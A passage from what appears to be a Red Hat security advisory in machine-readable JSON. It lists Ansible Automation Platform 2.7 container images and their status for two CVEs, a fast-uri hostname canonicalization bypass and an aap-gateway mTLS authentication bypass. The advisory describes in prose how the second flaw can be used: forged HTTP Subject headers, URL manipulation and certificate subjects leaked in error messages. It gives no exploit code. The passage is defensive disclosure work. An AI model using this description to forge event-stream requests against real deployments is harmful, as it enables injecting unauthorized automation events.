"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-uri: fast-uri: Security policy bypass due to improper Unicode hostname canonicalization"
},
{
"cve": "CVE-2026-18141",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2026-07-28T18:46:28.174000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2508155"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in aap-gateway, a component of Ansible Automation Platform\u0027s Event-Driven Ansible (EDA). An unauthenticated remote attacker can bypass mutual Transport Layer Security (mTLS) authentication for event streams. This is achieved by manipulating the event stream URL and forging the HTTP Subject header. The system also inadvertently discloses the expected certificate subject in error messages, which simplifies the attack. This vulnerability allows an attacker to inject arbitrary events into EDA, potentially triggering automated workflows.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aap-gateway: aap-gateway: Authentication bypass in Event-Driven Ansible via forged HTTP header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: Ansible Automation Platform 2.6 Event-Driven Ansible (EDA) is vulnerable to an authentication bypass, allowing unauthenticated remote attackers to inject arbitrary events into mTLS-protected event streams. This is due to a flaw in the `aap-gateway` configuration that permits bypassing mTLS by manipulating the URL and forging the Subject HTTP header. The vulnerability is exacerbated by information disclosure, where error messages reveal the expected certificate subject, simplifying targeted exploitation against default mTLS deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
